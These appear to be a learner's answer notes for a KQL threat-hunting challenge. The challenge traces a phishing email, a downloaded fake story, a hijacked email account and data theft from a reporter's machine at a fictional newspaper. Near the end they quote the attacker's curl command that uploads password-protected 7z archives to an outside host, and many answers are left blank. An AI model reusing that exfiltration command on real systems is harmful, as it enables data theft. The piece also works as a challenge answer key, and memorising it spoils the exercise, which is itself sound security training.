A Scandal

1. How many total emails were sent by this email sender to users at The Valdorian Times?

Ans 18

// KQL

Email
| where sender  == "[email protected]"
|summarize count()

1. When did [email protected] send an email to Ronnie McLovin?*

Ans

1. What domain was in the link from that email?

Ans : just update previous KQL with link

1. What was the subject of that email?

Ans ✅ [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles

1. When did Ronnie click on the link in the email from [email protected] ?

Ans for this we need to check source ip viz is ip of Rommie and outbound n/w events since on click link will send packet via n/w

1. What was the name of the .docx file that was downloaded to Ronnie's machine?

Ans Let's find out the Ronnie machine name

Now write KQL to find docx

1. When was this docx file downloaded?

Ans: Just add timestamp and project it.

1. When was the .ps1 file dropped to Ronnie's machine?

Ans

1. What IP address was used with plink on Ronnie's machine?

Ans

1. What username was used with plink on Ronnie's machine?

Ans In the previous command, we can find after ssh -l

$had0w

1. What password was used with plink on Ronnie's machine?

Ans same from the previous command

1. How many discovery commands were run on Ronnie's machine?

Ans 5

1. Your investigative buddy, who was also looking at Ronnie's machine, saw a weird file fakestory.docx being downloaded from a suspicious domain.

   Let's see if we can find evidence of this download in OutboundNetworkEvents.

   What is Ronnie's IP address?

Ans This question is simply lengthy, just run simple employees query to find details

1. What is the full URL fakestory.docx was downloaded from?

Ans we already have Ronnie IP's address from previous query now we can run kql to find url using outbound network

1. It does look like someone downloaded fakestory.docx to Ronnie's machine. Let's see if we can find that file on disk.

   What is Ronnie's hostname?

Ans A37A-DESKTOP in previous command we already had hostname

1. What is the sha256 hash of fakestory.docx on Ronnie's machine?

Ans:

1. When was fakestory.docx created on Ronnie's machine?

Ans: from previous command we can have timestamp

✅ 2024-01-31T09:47:51Z

1. Ronnie doesn't recall ever seeing that file or visiting that domain. It seems that this file download is evidence of hands-on-keyboard activity from the attackers.

   Let's see what the attackers did after they downloaded fakestory.docx by looking at ProcessEvents for Ronnie's machine.

   After downloading fakestory.docx, the attackers ran a command to rename and move the file to a different location.

   What is the new path for the document?

Ans: ✅ C:\Users\romclovin\Documents\OpEdFinal_to_print.docx

1. When was this command executed to rename and move the file?

Ans: 2024-01-31T10:26:20Z

1. OpEdFinal… that seems familiar.

   Wait a minute, that's the same file name you saw when you looked in the email logs to find Ronnie sending the draft to Clark Kent. Is it possible that the attacker used Ronnie's email to send this file to Clark?

   When was OpEdFinal_to_print.docx emailed from Ronnie's account to Clark Kent?

Ans: ✅ 2024-01-31T11:11:12Z

1. How many minutes elapsed between when the file was moved/renamed on Ronnie machine and when the email was sent to Clark Kent?

Ans: let's write a complex KQL query

1. Find the timestamp when the file was moved/renamed:

kql

1. Find the timestamp when the email was sent:

kql

1. What was the subject line of this email?

Ans: from previous command

✅ URGENT: Final OpEd Draft Edits (Please publish the following article in tomorrow's paper))

1. Wow! So it looks like the attackers downloaded the fake story, renamed it OpEdFinal_to_print.docx, and then sent the file to Clark Kent using Ronnie's email!

   Do you think this is the only thing the attackers did on Ronnie's machine? (yes/n

Ans: No

1. In the middle of your investigation, Ronnie finds you and shows you an alert she received from her dark web monitoring service. What is the domain mentioned in this alert?

Ans: ✅ hirerecruit.com

1. Oh no! It looks like someone may have stolen Ronnie's memes from her machine! Let's see if we can find evidence of the attackers stealing any data.

   We can timebound our analysis to find other actions that occurred around the same time by using this query:

Ans 2

1. Right after renaming fakestory.docx to OpEdFinal_to_print.docx, the attackers ran commands to steal (exfiltrate) data from Ronnie's machine.

   One command the attackers ran leveraged 7zip to compress all of Ronnie's dank memes into a .7z file. What is the name of the .7z file that contains the stolen memes?

Ans: DankMemes.7z

1. What is the name of the .7z file that contains files stolen from Ronnie's Documents folder?

Ans: Look for the MystolenData folder

✅ MyStolenDataFromDocuments.7z

1. What is the name of the .7z file that contains files stolen from Ronnie's Desktop folder?

Ans: ✅ MyStolenDataFromDesktop.7z

1. What is the password the attackers used to encrypt all of the .7z files?

Ans: ✅ thruthW!llS3tUfree

1. After compressing all the stolen data into .7z files, the attackers exfiltrated the data by uploading it to a custom portal on their website.

   What is the full command the attackers ran to do this

Ans: ✅ curl -F "file=@C:\Users\romclovin\Documents*.7z" https://hirejob.com/exfil_processor/upload.php

1. What domain was the stolen data uploaded to?

Ans: ✅ hirejob.com

1. Query ProcessEvents for all devices at Valdorian Times.

   Was data stolen from any other devices and uploaded to hirejob.com? (yes/no)

Ans: no , since there is no other system than "A37A-DESKTOP"

Next question onwards answers are straight forward